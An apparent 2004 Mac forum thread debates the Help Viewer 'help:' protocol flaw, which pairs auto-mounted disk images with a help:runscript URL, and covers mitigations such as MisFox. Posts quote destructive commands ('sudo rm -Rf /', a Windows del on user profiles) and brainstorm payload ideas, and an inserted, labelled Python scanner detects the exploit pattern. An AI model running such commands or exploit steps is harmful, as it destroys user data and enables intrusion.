2001-02-02: Apple Quicktime Plugin Remote Overflow Vulnerability
2001-01-25: FreeBSD ipfw Filtering Evasion Vulnerability


Because no one takes the time to exploit Apple vulnerabilities, doesn't mean it's not vulnerable. It means it's benefiting from obscurity. It may have fewer, but if you have 10 and patch them expediently, you're more secure than the one with 2 that doesn't patch for a long time. Unless you believe due to obscurity, you don't have to patch quickly. Currently how secure an OS is is being measured by how fast it is patched once the vulnerability is known. Let's time this one...

Analog Kid
May 17, 2004, 09:09 PM
I don't know what would be worse - deleting data or emailing random iPhoto pics to random people on your address list...
I think if I saw:
Enter your password when asked or we email your photos to your friends
sudo rm -Rf /
Password:


I'd give 'em what they're asking for...

Wonder Boy
May 17, 2004, 09:21 PM
damn. i ran the trial virus. even for a demo that worked fast. i tried to cancel the download but even that didnt work.

flyfish29
May 17, 2004, 09:39 PM
But, if you just disable the opening of "safe" files automatically, that will protect you for now. I just think it's only a matter of time before somebody exploits Help to do something really dangerous.

I am confused here...sorry...but even if you unselect the opening of "safe" files in Safari, won't you still suffer the problem when you go to open the installer or whatever it is/was that was downloaded?

Or does doing this just prevent a web site from having your browser download something you don't want or didn't choose and execute it by opening it automatically...maybe I just answered my own question?!?!

Johnny

Spades
May 17, 2004, 09:44 PM
I am confused here...sorry...but even if you unselect the opening of "safe" files in Safari, won't you still suffer the problem when you go to open the installer or whatever it is/was that was downloaded?

Or does doing this just prevent a web site from having your browser download something you don't want or didn't choose and execute it by opening it automatically...maybe I just answered my own question?!?!

Johnny

Yes, you answered your own question. This keeps the browser from launching whatever is in the .dmg automatically. You as the user could still run it by hand.

In any case, ignore what I said. As somebody else pointed out, disk images can still be mounted automatically even if that option is disabled. Get Misfox and change the program used for the help protocol to something else. I've changed it to chess.

MegaSignal
May 17, 2004, 10:05 PM
Yes, you answered your own question. This keeps the browser from launching whatever is in the .dmg automatically. You as the user could still run it by hand.

In any case, ignore what I said. As somebody else pointed out, disk images can still be mounted automatically even if that option is disabled. Get Misfox and change the program used for the help protocol to something else. I've changed it to chess.

So I've changed the help protocol from using the Help Viewer to some other application. Now, it seems that the non-malicious example of this (found at http://bronosky.com/pub/AppleScript.htm) simply runs the other application that I've selected. How is this going to help me? Was it within the Help Viewer application that the vulnerability was found?

[Using 10.2.8]

Zardoz
May 17, 2004, 10:19 PM
You don't call the ability to run a rm -Rf / on your Mac critical??

The correct command is rm -rf ~, smartass.

Plastic Chicken
May 17, 2004, 10:22 PM
It will help you because the other application you selected shouldn't run the AppleScript. HelpViewer can run AppleScripts because Apple thought it could be helpful. Also, you're in 10.2.8, so the demo shouldn't work in the first place (doesn't for me).

Let me say it again:

Unchecking "Open 'Safe' Files After Downloading" WILL NOT PROTECT YOU FROM A DMG MOUNTING! If the URL to the dmg is prefixed with "disk://" instead of "http://" it will mount anyway.

And the best solution is NOT to delete your Help folder. The best solution is to download an application and change the application that deals with "help:" to something more harmless than HelpViewer...something that won't execute AppleScripts. That way you still have HelpViewer if you ever need it.

MegaSignal
May 17, 2004, 10:36 PM
It will help you because the other application you selected shouldn't run the AppleScript. HelpViewer can run AppleScripts because Apple thought it could be helpful. Also, you're in 10.2.8, so the demo shouldn't work in the first place (doesn't for me).

Let me say it again:

Unchecking "Open 'Safe' Files After Downloading" WILL NOT PROTECT YOU FROM A DMG MOUNTING! If the URL to the dmg is prefixed with "disk://" instead of "http://" it will mount anyway.

And the best solution is NOT to delete your Help folder. The best solution is to download an application and change the application that deals with "help:" to something more harmless than HelpViewer...something that won't execute AppleScripts. That way you still have HelpViewer if you ever need it.

Thanks - that's exactly the info I was looking for.

AT71
May 17, 2004, 10:52 PM
So what has Apple said to all of this?

No word from them yet.

BrianKonarsMac
May 17, 2004, 11:04 PM
Does anybody feel that this, in part, is the Mac community's fault? We go on blabbing how we have no viruses/trojan horses/etc and lo and behold, we get two issues in a week. It is almost as we dared them to come up with these and now that they have arisen, we are pissed b/c it seems the world is picking apart the Mac OS. Perhaps had we not had this "holier than thou" attitude, we wouldn't be worrying about this.

you are correct, i think all of this "Mac OS can't get a virus" talk is nonsense, and only drives people to write viruses just to shut those people up. It's become the holy grail of virus writing in a sense, anyone can code a Windows virus, but to do damage on the Mac platform requires a respectable level of knowledge.

devman
May 17, 2004, 11:12 PM
isn't InternetConfig from OS9 days? oh well what they really meant was to change what application handles "help:". change it to something besides Help Viewer. http://www.clauss-net.de/misfox/misfox.html MisFox can do it. Just click on the "Protocol Helpers" tab. i used Address Book instead. anything will do. now click the example link and voilà! nothing happens.

Edit: The MisFox site is in German but the program is in plain English

I'm a Mac newbie... so how do I change the help protocol helper back to Help Viewer? I got misfox and can easily see how to change it to be Chess or any other app I know about. But to change it back to Help Viewer I have to be able to find the Help Viewer app using the file open (finder) dialog that misfox uses. I can't see anything called Help Viewer (except a classic version). What file on my hard drive is the OS X Help Viewer app?

~Shard~
May 17, 2004, 11:31 PM
The correct command is rm -rf ~, smartass.

Hmm, I typed in rm -rf ~, smartass. and it doesn't seem to work... ;) :p

Spades
May 17, 2004, 11:31 PM
What file on my hard drive is the OS X Help Viewer app?

/System/Library/CoreServices/Help Viewer

ERayFree
May 18, 2004, 01:00 AM
Does anybody feel that this, in part, is the Mac community's fault? We go on blabbing how we have no viruses/trojan horses/etc and lo and behold, we get two issues in a week. It is almost as we dared them to come up with these and now that they have arisen, we are pissed b/c it seems the world is picking apart the Mac OS. Perhaps had we not had this "holier than thou" attitude, we wouldn't be worrying about this.

Oh, I agree, OSX is a far superior OS than Windows however sometimes, as members of the Mac community, we try to rub it in to the other guys a little too much. For the longest time, the rally cry of many was that OSX had no viruses/trojans/etc and we hammered this point to death when an OSX vs Windows argument would arise. It was only time before somebody decided to drop us down a peg or two and we are now seeing the beginnings of this. I say we still should tell the world about how great an OS Apple has but perhaps we shouldn't be so matter-of-fact about it.

Forgive me for the semi-trolling rant but...

I love you leftbanke7... thank you for giving me some hope that not all Mac users are just Apple sycophants trying to justify their expensive computer purchases to each other. I'm waiting for the next G5 Powermacs to come out before I buy my first ever Apple computer. I'm not switching completely because I love my Opteron system and my Sun workstation (well, really I hate all operating systems equally, just for different ones for different reasons). I'm going to test the Apple water and trying to keep an open mind. But I swear, most of the people on here (and the Mac nerds I know in real life) make me scared to buy one because I don't want to be associated with this crowd, haha. I guess I just won't tell anyone I own a Mac.

I think most anyone will agree that Mac OS X is inherently more secure than Windows, no matter how hard Microsoft tries to fix it. But don't forget that the best security is anonymity... Most hackers and script kiddies grew up on Windows and don't want to waste their time learning the quirks of a new OS especially one that hardly anyone uses. If tens of thousands of people concentrated on breaking Mac OS X, Linux, FreeBSD, Solaris or whatever like they do on Windows, then they're going to find ways in... even if it takes a lot longer.

So you guys can keep telling yourselves that either no one can hack your Mac or that no one will ever really try. As for me, I'm going to buy the Norton Anti-virus for my G5, encrypt my personal data and back it up regularly... just like I do with all my computers, just in case. All it takes is for one creative person to come up with that one nifty worm to ruin your day.

virividox
May 18, 2004, 01:02 AM
Hmm, I typed in rm -rf ~, smartass. and it doesn't seem to work... ;) :p

HAHAHAHA made my morning

still not really worried; i dont go downloading random dmg files anyway

JFreak
May 18, 2004, 01:45 AM
I think if I saw:
Enter your password when asked or we email your photos to your friends
sudo rm -Rf /
Password:


I'd give 'em what they're asking for...

why wouldn't you just disable airport connection or disconnect bluetooth connection or unplug the ethernet cable? there's no way anyone is sending anything from your computer if it doesn't have network connection?

think, people, think.

i have still not heard of a mac osx VIRUS, by definition: a malicious code that infects your computer without your approval and spreads to another computer without you knowing anything about it, and finally doing something to your computer that you have not asked to.

trojans and such are just showing people's stupidity.

back in the days of 300baud modems everyone (that was using a network connection) knew BY HEART that you should never trust anything you download to be safe. now (that everyone uses a network connection) hardly nobody (other than the people who knew back then) knows that the network can contain files that are not safe. this is the problem.

if i have a script on my desktop that wipes my whole home directory clean, is it a virus? no. it is a script, made by me, and i would be stupid to run it. is the os insecure because i can make such a script? no. it is a feature that is intended to be used wisely.

if the operating system lets me destroy MY home directory, is it insecure? no. it has given me a right to have files and do whatever i wish with them. is it insecure because i can authorize some malicious code from somewhere-in-the-internet to be run and do anything? no. but i am, if i do such a stupid thing.

there's a joke about this: "user error. replace user and press any key when ready." or, "memory overflow. add memory for user and press any key when ready."

bottom line: it is THE USER who is insecure. stupid things happen for stupid people. click anything if you want anything to happen. click nothing if you want nothing to happen. expect anything (in the internet) to be insecure to be safe. get it?

i wish apple could upgrade users to have a brain ;)

Skiniftz
May 18, 2004, 01:47 AM
your point exactly.

most viruses, etc, spread through the principles of social engineering. gullible, non-thinking sheepeople spread viruses.

anyone with a brain will never be caught by anything like this.

er.. you know netsky and mydoom? Guess how they spread? They actually get a user to type in a password to decrypt an attached encrypted ZIP file then execute the attachment.

Users are stupid. This fact is proven time and time again.

Skiniftz
May 18, 2004, 01:52 AM
The correct command is rm -rf ~, smartass.
rm -Rf ~ will start recursively deleting from your HOME FOLDER.

rm -Rf / will start recursively deleting from the root directory.

Point of note is that rm with -f option will not stop if it encounters files it cannot delete for whatever reason, so in other words if you start at the directory root it would delete ALL files that your user account is able to delete.

Still may not be so bad, however considering that many Mac users have a blank password on an administrative user (this is the DEFAULT setup behaviour in OSX) then this is a serious problem.

PolarbearTed
May 18, 2004, 02:33 AM
So what has Apple said to all of this?

No word from them yet.

Well judging from the article it's quite recent, you have to give them some time to respond to it.

Anyway, why not actually read the article and follow some of the exemplary advice from jessefoxperry and take some precautions? First thing you should probably do is go into Safari's preferences and uncheck the "Open Safe files after downloading" check box.

Cheers,

PolarbearTed

caveman_uk
May 18, 2004, 03:17 AM
So you are implying that the script cannot delete my system, which I can reinstall anytime, only all my private documents, music, photos, etc... which cannot be "reinstalled" unless you've got a backup of the >100GB HDD that usually ship today. A really positive remark...
So you'd rather not have the ability to delete your own files? rm -rf / is there for a reason. It's called unix.

Anyway, these 'viruses' aren't really 'viruses'. Any bozo can write a program that can delete all your files - hell we could do it in C if you're bored of looking at bash or applescripts. It's malicious code true but a virus - I think not. A true mac virus is perfectly possible but these aren't it.

moll
May 18, 2004, 03:53 AM
There is NO way in Windows (no way that is not a bug) to bypass an alert window after clicking on a link that points to an .exe

Oh great... So you are implying that the script cannot delete my system, which I can reinstall anytime, only all my private documents, music, photos, etc... which cannot be "reinstalled" unless you've got a backup of the >100GB HDD that usually ship today. A really positive remark...

Oh please... get real...

IF you don't back up your data you WILL lose everything at some point in the rest of your life. Your hard-drive WILL fail or your computer WILL get stolen or you WILL get hit by a virus, or something.

Something will wipe everything out. It's a 100% certainty.

The platform you use is completely irrelevant. And it's not exactly difficult or expensive to backup to a firewire external drive (or preferably two if you are cautious by nature, and preferably leave one with a friend - it might sound paranoid but once you've been burgled once you get twitchy).

The security flaw discussed here is definitely serious, but at least it is true to say it can only wipe out whatever you have permission to access on a unix system.

And if you don't back that up you're going to lose it one day anyway.

m

billyboy
May 18, 2004, 04:05 AM
Is it too simplistic to download files to a separate partition open them and see what happens. If OK just install in your working partition.

Sailfish
May 18, 2004, 04:18 AM
Taking your Help Viewer application in System/Library/CoreServices and placing it on a CD, etc. and removing the original works very well to stop the exploit.

We all talk up how wonderful Mac OS X security is and it is more secure than Winblows by a thousand percent.

But Apple not providing a sort of firewall for downloads and letting dmg's to automagically appear on our computers is such a security lapse oversight it's beyond belief.

Who knows what some dumb newbie or kid will doubleclick on?

Actually this exploit has been demonstrated on Slashdot and I personally notified Apple several months ago about it.

If you want to see something scary, download Little Snitch and watch as Apple's Address Book makes an outgoing connection.

Now WTF is up with that?

Don't get me wrong, I love Apple, but some things don't look all that nice. Is Apple following M$ lead and working for the spooks in DC?

Creepy, now give me back my tinfoil hat.

Skiniftz
May 18, 2004, 04:54 AM
<snip>Anyway, why not actually read the article and follow some of the exemplary advice from jessefoxperry and take some precautions? First thing you should probably do is go into Safari's preferences and uncheck the "Open Safe files after downloading" check box.
<snip>

Useless as it doesn't stop disk:// links being automounted.

broken_keyboard
May 18, 2004, 04:55 AM
Who the heck makes a URL protocol that can execute shell scripts? Crazy stuff. They must have been assuming that if it's a local script then you trust it. Well then they shouldn't make automounting things.

Another way to get a malicious shell script on to someone's machine without using a dmg would be to put it in the public folder of their iDisk. It will be synched to /Volumes/dotmac.user.name/Public where the URL can execute it.

Plastic Chicken
May 18, 2004, 05:38 AM
still not really worried; i dont go downloading random dmg files anyway

This is 2004. If someone wants you to download something, all you have to do is navigate to the appropriate page, and the download can start without you explicitly clicking on it.

nekr0sis
May 18, 2004, 05:40 AM
You can also use this to do the same thing as MisFox. It just does the Helper protocols.

http://www.monkeyfood.com/software/MoreInternet/

It's in the form of a preference pane, which I find more convenient.

devman
May 18, 2004, 06:21 AM
/System/Library/CoreServices/Help Viewer

Thank you so much! Typing that in to the finder search box does not find that file (at least on my box) so thanks for pointing me to it.

MasterMac
May 18, 2004, 06:35 AM
Still may not be so bad, however considering that many Mac users have a blank password on an administrative user (this is the DEFAULT setup behaviour in OSX) then this is a serious problem.

Uh, no? Last time I did a fresh install (panther, back when it first came out), it asked me for an administrative password, and if I tried to make it blank it told me that wasn't a wise idea (but it would let me do it anyway after making sure I was sure that was what I wanted to do) ;)

Apple Hobo
May 18, 2004, 06:44 AM
If you want to see something scary, download Little Snitch and watch as Apple's Address Book makes an outgoing connection.

Now WTF is up with that?


LS didn't alert me of anything when I used Address Book. Maybe you were using a feature that needed to make a connection somewhere. :confused:

lost_n_mad
May 18, 2004, 07:01 AM
Forgive me for the semi-trolling rant but...

As for me, I'm going to buy the Norton Anti-virus for my G5, encrypt my personal data and back it up regularly... just like I do with all my computers, just in case. All it takes is for one creative person to come up with that one nifty worm to ruin your day.


That's not really trolling IMHO. Though for a bit of advice avoid anything by Symantec, Norton's hosed my system methodically and periodically every time I tried to use that line of products (and I've read those novels they call manuals). I back up my system and my fiancee's regularly (every other month), I run Virex before each back up, read my Logs on a biweekly basis, and have not suffered a problem since 10.1 (other than Norton experiments). Enjoy your new Mac, and let me know about the G5's (all I hear are problems people want fixed cause it's what I like to do as a hobby).

cb911
May 18, 2004, 07:54 AM
well said JFreak. stupid things do happen to stupid people. :D which means i've got nothing to worry about. :p but i wonder what happens to over-confident or complacent people? :eek: ;) :p

Torajima
May 18, 2004, 08:03 AM
Just to put this in perspective...

Mac OSX may have a few "vulnerabilities", but none of these are true viruses or worms. I've used the Mac platform for well over 10 years, and I've never been infected.

OTOH, viruses and worms have been a real nightmare on the PCs I administer at work. In fact, we've had so many problems with viruses and anti-virus software in general that I'm slowly upgrading our machines to Macs.

Really, I don't understand why any MIS/IT person wouldn't seriously consider Macs these days. I guess job security is one possibility, but I've got better things to do than reboot crashed machines and reinstall operating systems trashed by Norton...

centauratlas
May 18, 2004, 08:13 AM
:rolleyes: Here's some vulnerabilities from 2001 through 2004:... Let's time this one...

Excellent points. :-)

Just remember, the clock started 23/02/04, so it is ALREADY slow.

Trekkie
May 18, 2004, 08:16 AM
You don't call the ability to run a rm -Rf / on your Mac critical??

No more than you being able to put an icon on a batch file and delete your my documents folder on windows.

That is not a vulnerability, it's an idiot trap. Anyone that downloads a program off the internet from a questionable source such as limewire and runs it and loses their home directory is a dingbat and deserves it.

You can do the exact same thing in Windows. You just have it del %allusersprofile%\*.* /FSQ and it'll nuke your entire start menu. Or you could do the same thing to %windir% and it'll start nuking the OS until it hits an open file or two, but the damage is done.

centauratlas
May 18, 2004, 08:18 AM
The correct command is rm -rf ~, smartass.

Actually, either are ok. / would do more damage in all likelihood. ~ is your home directory. / is root and on my computer I have a directory named "Volumes" in which my other volumes are located. So with / even they are not safe. -r is recursive, -f is force (e.g. just do it).

ElectricSheep
May 18, 2004, 08:19 AM
LS didn't alert me of anything when I used Address Book. Maybe you were using a feature that needed to make a connection somewhere. :confused:

I can tell you exactly what is going on here. If you add any contacts to your Address Book that have an @mac.com email address or instant message handle, and you do not set a default picture for them, Address Book will connect to homepage.mac.com via HTTP and attempt to fetch their profile picture for you.

There is no giant conspiracy going on here. There is no big brother. Address Book is simply being intelligent about Mac.com entries, and it knows that if someone has an @mac.com email handle, they have a Mac.com account. Missing information about them can be automatically fetched from homepage.mac.com, provided it is available.

centauratlas
May 18, 2004, 08:20 AM
Well judging from the article it's quite recent,
First thing you should probably do is go into Safari's preferences and uncheck the "Open Safe files after downloading" check box.


Just three points and a suggestion: ;-)
1. Apple was notified (according to the original description) on 23/02/04, so it isn't "quite recent." It is *just* quite recent that it was publicized. If they'd just found out about it, I'd agree with the point.

2. "Open Safe files" isn't enough! That won't stop many of the methods of using the exploit.

3. The reason why this isn't just "user stupidity" is that with URL spoofing you can trick someone into going to an incorrect URL and downloading the wrong file. Suppose VersionTracker was hacked, sending you the wrong URL.
Likewise, who is trusted? Only Apple? Microsoft too? Adobe? Someone here posted this link: http://www.monkeyfood.com/software/MoreInternet/ I've never heard of it before. Is it a trusted source? Not to me because I don't know who they are. Probably it is, but there is no way to verify it without clicking the download dmg button. Who wants to download the DMG and find out? And if you did it, do I trust you that you actually did it?

A solution (and what I think is perhaps a good one) is to run Help Viewer (or any of the applications that are vulnerable) at a different set of permissions. e.g. It would run them as a different user with no permissions to write (and consequently delete) in any directory, and only read in, say, a particular directory (to avoid looking for personal information to email). This would be a change Apple would need to make, but it would be one solution that would hardly alter the user's experience.

jholzner
May 18, 2004, 08:26 AM
No. But at least Apple's issues are fewer, and patched quicker, than in Windows.

Besides, this issue may not even be real. I'm just now trying the demonstration and it doesn

Quicker?? Apple was notified of this in February. We've had two security updates since then and neither have addressed it. I don't think they've addressed the problem with AFP either.

Trekkie
May 18, 2004, 08:34 AM
I thought I didn't buy windows.... :mad:

oh please. Of all the things that have happened to windows over the last six months compared to two non-propagating trojans (one which is even debatable if it's a 'trojan' or not) this is chump change.

Mac OS X doesn't get hacked & crashed the instant you plug it into a network connection with more than 20 people on it.

Mac OS X doesn't propagate a trojan to everyone in god just by reading an email.

Both of these trojans require user interaction to get started, and neither of them propagate.

And even if they did, that's the first virus in what, 5 years? 10 years?

ElectricSheep
May 18, 2004, 08:51 AM
FWIW, this is how this thing works:

A user is directed to a page that does two things: (1) Downloads a disk image to the user's computer which will hopefully be automounted, and (2) redirects the page to the URL "help:runscript=MacHelp.help/Contents/Resources/English.lproj/shrd/OpnApp.scpt" with the argument "string='Volumes:0x04_script:0x04_script.term'"

What this does is instructs the Help Viewer application to send the «event helphdhp» AppleEvent to a script file located at a path relative to /Library/Documentation/Help/. If the script file does not respond to this Apple Event, nothing will happen. You cannot use this method to directly execute non-compiled applescript, binary executables, or applescript which is inline with the URL. You have to find a script which responds to «event helphdhp». I imagine that there are not a whole lot of these scripts save for the two bundled with the Help Viewer application itself: OpnApp.scpt and opnbndsig.scpt. It is an unfortunate thing that both of these scripts accept a single argument, and then instruct the Finder to open that argument.

This basically means that you can get the Finder to open any file if you have the path to it. If you want to execute your own code, you have to have it downloaded to a known path first. This is where the disk images come in. When a disk image mounts, it is placed at a known path: /Volumes/[imagename].

- You cannot execute any script on the system with this. Only scripts which respond to the «event helphdhp» AppleEvent can be run.
- You cannot execute inline or non-compiled AppleScript with this. Scripts must be compiled, and must already exist on the victim's machine.
- You cannot execute shell commands with arguments unless you package it all into a .command file and have it downloaded to the victim's computer first.
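A defender-side check for the two-step pattern described in the post above, added here as an example and not part of the original thread: it scans a page's HTML for a disk-image reference together with a `help:` URL that asks for `runscript` and passes a `Volumes:` path. The function names, verdict labels and both sample pages (including the benign `help:` link) are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

URL_ATTRS = {"href", "src", "action", "data"}
# help:/disk:// URLs inside a quoted string in script text
IN_TEXT = re.compile(r"""(["'])((?:help:|disk://).*?)\1""", re.I | re.S)
RUNSCRIPT = re.compile(r"runscript\s*=\s*(\S+)", re.I)
STRING_ARG = re.compile(r"string\s*=\s*['\"]?([^'\"]+)", re.I)


def classify(url):
    """Return a finding dict for one URL, or None if it is not of interest."""
    u = unquote(url).strip()
    low = u.lower()
    if low.startswith("help:"):
        m = RUNSCRIPT.search(u)
        if not m:
            return None  # help: link that does not request a script
        arg = STRING_ARG.search(u)
        target = arg.group(1) if arg else ""
        return {
            "kind": "help-runscript",
            "url": u,
            "script": m.group(1),
            "target": target,
            # colon-separated path into a mounted volume, as quoted in the post
            "opens_volume": target.lower().startswith("volumes:"),
        }
    if low.startswith("disk:") or low.split("?")[0].endswith(".dmg"):
        return {"kind": "disk-image", "url": u}
    return None


class LinkCollector(HTMLParser):
    """Collect URL candidates from attributes, meta refresh and script text."""

    def __init__(self):
        super().__init__()
        self.urls = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script":
            self._in_script = True
        if tag == "meta" and (attrs.get("http-equiv") or "").lower() == "refresh":
            m = re.search(r"url\s*=\s*(.*)", attrs.get("content") or "", re.I)
            if m:
                self.urls.append(m.group(1))
        for name in URL_ATTRS:
            if attrs.get(name):
                self.urls.append(attrs[name])

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.urls.extend(m.group(2) for m in IN_TEXT.finditer(data))


def scan_page(html):
    """Return (verdict, findings) for one HTML document."""
    parser = LinkCollector()
    parser.feed(html)
    parser.close()
    findings = [f for f in map(classify, parser.urls) if f]
    kinds = {f["kind"] for f in findings}
    if "disk-image" in kinds and any(f.get("opens_volume") for f in findings):
        verdict = "chain"       # both steps from the post on one page
    elif "help-runscript" in kinds:
        verdict = "suspicious"  # script request without a visible image
    elif "disk-image" in kinds:
        verdict = "review"      # disk image reference only
    else:
        verdict = "clean"
    return verdict, findings


# Constructed sample pages (not captured traffic).
SAMPLE_CHAIN = """<html><head>
<meta http-equiv="refresh" content="1; url=help:runscript=MacHelp.help/Contents/Resources/English.lproj/shrd/OpnApp.scpt string='Volumes:demo_image:demo.term'">
</head><body><a href="disk://example.invalid/demo_image.dmg">image</a></body></html>"""

SAMPLE_BENIGN = """<html><body>
<a href="help:search=printing">Help</a>
<a href="http://example.invalid/index.html">Home</a>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("chain", SAMPLE_CHAIN), ("benign", SAMPLE_BENIGN)):
        verdict, findings = scan_page(page)
        print(name, verdict, [f["kind"] for f in findings])
```
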

centauratlas
May 18, 2004, 08:55 AM
two non-propagating trojans (one which is even debatable if it's a 'trojan' or not) this is chump change.


The problem is that this could easily be made into a propagating problem combined *with* some of the other vulnerabilities out there.

Here is a question: You get a small DMG from a friend who is in your address book. You presumably trust them. The email says, "I found this great utility to control your internet preferences, to avoid a trojan that hijacks your help viewer. This was just announced today, see <infoworld article or whatever>." What do you do? 90% of the people will click it.

What happens to you? It is the trojan itself. Instead of the email, it is the trojan mailing itself out to everyone in your address book - something can EASILY do that. Then it can easily do an rm -rf /.

Or it tries to start up the remote desktop self-start (from the command line there is a command for it).

Or it uses the command line to open up a small additional application on the disk image which can do more.

Or it uses wget (or similar) to download and start something at the command line.

Additional possibilities depending on what it does above and what is on your system:
Or it can open up ports on your firewall or just turn it off.

Or it can install a key stroke recorder and periodically send out "interesting" keystrokes (e.g. anything typed while connected using an SSL connection).

Or it can say "Disk Utility needs your admin password to mount this signed image"? Most people would type it in because OS X has us (I might do it) conditioned to do so. Then it could email (or send via TCP without using your mail program) the admin plus your IP somewhere.

Or it can install a background application to listen on a particular port while re-configuring your firewall to allow that port to be open.

Or it can email documents in your "Documents" folder somewhere. (e.g. just email files < 5K in size. What kind of info is in those files?)

Just because the demo is non-malicious and doesn't exploit all the possibilities doesn't mean they are not there. There are tons more things it could do, from the really subtle so you would never know it to the really damaging and everything in between.

There are enough vulnerabilities out there that it could be done. Worms are easy to write. Viruses are too. Trojans are too. Someone with a good knowledge of Unix could write one to take advantage of 8 to 10 of the most common open vulnerabilities and it would be a huge problem.

Someone who wrote one that exploited 8-10 Unix problems (including Mac and Linux) *and* 8-10 Windows problems would cause complete havoc because there wouldn't be only one method of propagation to stop, there would be multiple routes to infection for just about all of the machines on the net. And if Unix machines are infected, Windows are, and Macs are (and perhaps Cisco router vulnerabilities), how the heck will people get updates to fix them? CD? It could be done and it will be done, it is just a question of when. Up until now you've had amateurs doing it, script kiddies etc.

Hopefully it will remain that way, but I believe at some point there will be someone who decides to exploit many (not just 1 or 2) problems at once, who doesn't make stupid programming errors (e.g. like the Morris Worm or many others), who is based where they don't care (e.g. North Korea or some small, but big-time criminal organization or terrorists) and has a specific malignant purpose. Then many billions of hours of work will be lost or stolen.

centauratlas
May 18, 2004, 09:05 AM
FWIW, this is how this thing works:
- You cannot execute shell commands with arguments unless you package it all into a .command file and have it downloaded to the victim's computer first.

Good description, thanks!

What about if the .command file is on the disk image you just downloaded and auto-mounted? To me it seems like that would be enough because you'd know the path, as you said.

ElectricSheep
May 18, 2004, 09:18 AM
There is a clear difference between a remote exploit and protecting users from their own stupidity. How do you propose to go about protecting people from their own misinformed behavior?

Don't run code that you didn't ask to have sent to you via email attachment. Don't leave your luggage unattended for any length of time at the airport. Don't use plugged in electronic devices when in the bathtub.

Computers have gotten to be some pretty complicated machines. Given the connectivity that intra/internetworking provides these days, the consequences of your own stupid actions aren't limited to yourself anymore. Other people on the same network have to suffer with you.

Instead of bending over backwards to protect people from themselves, the University I attend has shifted the responsibility to the user. If you want to join the campus network, then you must complete a competency test. You must demonstrate that you have at least some idea of what you are doing before being connected to everyone else on campus. It makes perfect sense, and we do the same thing to people who want to go out and drive a car on public roads.

whooleytoo
May 18, 2004, 09:31 AM
There is a clear difference between a remote exploit and protecting users from their own stupidity. How do you propose to go about protecting people from their own misinformed behavior?

Don't run code that you didn't ask to have sent to you via email attachment. Don't leave your luggage unattended for any length of time at the airport. Don't use plugged in electronic devices when in the bathtub.

Well, now add to that list:

"Never browse a webpage without having read its source code."

Because that's all it takes to fall victim to a potential exploit of this vulnerability. No "click to download" step is necessary.

(Of course, I don't know many browsers that will allow you to view a page's source without first viewing the page itself.. so...)

pjkelnhofer
May 18, 2004, 09:34 AM
You can also use this to do the same thing as MisFox. It just does the Helper protocols.

http://www.monkeyfood.com/software/MoreInternet/

It's in the form of a preference pane, which I find more convenient.

Thanks for the link, but I am afraid to use it as the only way to get it is by downloading a .dmg file. ;)

Seems like a good temporary fix.

Abstract
May 18, 2004, 09:45 AM
For those people who say that only stupid people would open .dmg files from emails, blah blah blah, I have one question for you: What does being stupid or smart have anything to do with it? Personally, I believe that if you believe the above to be true, you are an idiot in every sense of the word. My stepfather is probably smarter than 95% of you, but he really doesn't know much about computers. Email, some gardening websites, Word, Internet Explorer ( :rolleyes: ), and he's happy about everything. Mp3...what's that? He really doesn't care about "trying out the latest thing."

My mom doesn't know how to turn a computer on, but she's not stupid either. According to her, "I can't find the button on the computer that says "ON/OFF", so I didn't touch anything in case I pressed something that I shouldn't have." Sounds stupid to you, but wait a second....she's right!! There is NO button that says "On/Off". Instead, my PB has a button that has markings of a circle with a vertical line that extends from the centre. My brother's desktop has an even more obscure Power button....

Here's the thing: If you post here, YOU ARE AN INTERNET NERD. Instead of saying that only an idiot would open a .exe or .dmg file attachment, why not just accept the fact that you're a nerd and other people aren't "stupid" just because they take no interest in what you find interesting. ;) Being ignorant about computers isn't stupid. Ignorance and stupidity are different. Other than writing email and Word documents, computers are something that many people don't care about, so they won't read pages like this to find the newest security threats. Gasp!! Can this be true? Oh yes it is, just like you're not good at doing things outside of the internet world, like socializing and understanding differences in experience and knowledge amongst different people, since you don't go out often enough....you sweet nerd, you.

*continues playing Tetris*

ElectricSheep
May 18, 2004, 09:46 AM
Well, now add to that list:

"Never browse a webpage without having read its source code."

Because that's all it takes to fall victim to a potential exploit of this vulnerability. No "click to download" step is necessary.

(Of course, I don't know many browsers that will allow you to view a page's source without first viewing the page itself.. so...)

Now I never equated this vulnerability to one side or that other. You are making an assumption.

I'm responding to people crying out for measures to protect the users that open every attachment, run everything they can get their hands on, and enter their password every time it's prompted. Users who click willy nilly everywhere they can without really knowing what is going on. Before the mass connectivity of the internet, nobody really cared if you couldn't operate a computer or not. Things have changed. Remember what I said about my Uni. Nobody gets on the network unless they can demonstrate some basic understanding of how to operate a computer, and an understanding of the risks that come with being connected to internet. If you can't do it, you pose a serious risk to not just yourself, but everyone else on the network.

Whose responsibility is it when it comes to these kinds of problems?

Should the companies turn computing into a completely passive experience like watching TV to 'secure' its users, or should more attention be paid into getting users to become familiar with the equipment they just purchased?

JGowan
May 18, 2004, 10:19 AM
anyways, most people tend to not exploit os x security holes, due to the little amount of people it would harm, we are deemed as a group not worth the effort of a virus...

You would think some PC Nerd/Anti-Mac Punk would love to make us squirm with a worm.

Skiniftz
May 18, 2004, 10:48 AM
You would think some PC Nerd/Anti-Mac Punk would love to make us squirm with a worm.
Speaking as a multi-vendor admin I must confess I'm enjoying this exploit; it's nice to see the sneering obnoxious holier-than-thou Mac zealots having their noses rubbed in it for a change :D

What is absolutely HILARIOUS is them all trying to talk it down!

If this were a Microsoft exploit the sky would be falling and those same people would be zealoting (I just made that word up) about how much better the Mac is.

I'm not arguing in the slightest that BSD is inherently more secure than Windows, but there are a lot of drama queens out there.

whooleytoo
May 18, 2004, 10:48 AM
Now I never equated this vulnerability to one side or that other. You are making an assumption.


Well, this thread is about this vulnerability.. so 'twas a fair assumption.. ;)


I'm responding to people crying out for measures to protect the users that open every attachment, run everything they can get their hands on, and enter their password every time it's prompted. Users who click willy nilly everywhere they can without really knowing what is going on. Before the mass connectivity of the internet, nobody really cared if you couldn't operate a computer or not. Things have changed. Remember what I said about my Uni. Nobody gets on the network unless they can demonstrate some basic understanding of how to operate a computer, and an understanding of the risks that come with being connected to internet. If you can't do it, you pose a serious risk to not just yourself, but everyone else on the network.


Perfectly fair, sensible and reasonable steps. But even those won't protect against more subtle exploits.


Whose responsibility is it when it comes to these kinds of problems?

